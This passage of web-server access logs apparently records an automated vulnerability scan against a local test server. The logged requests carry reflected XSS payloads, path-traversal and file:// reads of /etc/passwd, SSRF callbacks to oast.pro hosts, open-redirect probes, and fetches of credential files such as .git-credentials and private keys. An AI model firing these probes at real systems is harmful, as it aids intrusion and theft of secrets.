+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://ca28bc0smpvbbtig07h01y3ey3k55ytni.oast.pro%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://ca28bc0smpvbbtig07h0u7sanryrhmbax.oast.pro&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; 